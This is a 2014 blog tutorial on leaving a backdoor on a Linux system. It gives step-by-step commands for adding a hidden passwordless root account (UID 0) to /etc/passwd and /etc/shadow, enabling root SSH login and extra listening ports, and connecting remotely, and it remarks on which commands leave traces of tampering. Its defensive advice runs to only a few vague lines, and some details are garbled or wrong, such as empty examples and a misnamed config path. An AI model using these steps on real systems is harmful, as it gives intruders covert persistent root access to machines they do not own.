Saturday, 13 December 2014

Hack: Simplest of Backdoors.



Computer System A (Alice).


Backdoor is software that allows access to computer system, a call to certain function.

Backdoors are left by programmers & hackers to *easily & quickly* gain access to hacked or normally accessed machine at later time.

It's useful skill for any net admin, to be able to leave a backdoor on a computer system - to protect hardware-software infrastructure against data leaks or machine control attempts of this type - especially if combined with programming or scripting.

In this tutorial we'll explain how to leave a backdoor on Linux system & how to protect from that type of attacks.


---
How to do leave a backdoor on a Linux system?

1. Modify /etc/passwd & /etc/shadow files properly, to add user with intelligently chosen name.

to /etc/passwd file we add line:

username::0:0::path:shell

where:
- username is name of the user added
- path is user's home path - for example /root for root user
- shell is shell used - for example /bin/bash
- 0 is user identifier (use 0 for root user)
- 0 is group identifier (use 0 for root group)

for example:
bond::0:0::/root:/bin/bash

to /etc/shadow we add line:
username::::::::

where:
- username is name of the user added

for example:
bond::::::::

then we call passwd username command to finalize process.

for example:
passwd bond


2. Configure & start sshd service which allows for remote access to computer using secure (encrypted) connection.

we edit file: /etc/ssh/sshd_config
we modify line with PermitRootLogin command if neccessary, to allow for root login.
for example, we can comment it with # character.

# PermitRootLogin no

we start sshd service.

depending on Linux distribution, this command can vary, for example:
/etc/init.d/sshd start
/etc/init.d/service ssh start

we might need to locate sshd file with 'locate sshd' command.


3. Connect remotely to computer system with backdoor.

ssh username@ipaddr
ssh username@ipaddr -p port

where:
- username is name of the user added in the backdoor creation process
- ipaddr is the ip address of computer system with backdoor
- port is the port number of computer system with backdoor (22 by default)

for example:
ssh bond@192.168.1.100
ssh bond@192.168.1.100 -p 2016

additional ssh port(s) are enabled in /etc/config/sshd_config file by adding line(s):
Port portnumber

where:
- portnumber is number of port to listen on.


for example:



/etc/config/sshd_config : ssh configuration file,
ssh listen ports configuration is there.


then we need to start or restart ssh service.

for example:
/etc/init.d/sshd start
service ssh start
/etc/init.d/sshd restart
service ssh restart

4. Checking if ssh service is running, and on which ports it listens:



'sockstat pipe grep' command.


sockstat tool, if not available, can be obtained from software repository with:

apt-get install sockstat

(this changes operating system configuration, leaving a trace of tampering - as most of commands do, but this one is serious trace of tampering).

or we can use commands:
- service ssh status
- service sshd status

if nothing of above works, keep hacking, perhaps there are commands that work...


----
How to protect computer system against this type of backdoors?

for now have following ideas:

- manual checking of files regularly (/etc/passwd , /etc/shadow),
- using grep script to automate above mentioned check,
- using 'hidden' kernel functionality - which is beyond scope of this tutorial...).

(to be elaborated if neccessary, but i need a little of time to think, to do it properly enough).

that's all.




Computer System B (Bob).

No comments:

Post a Comment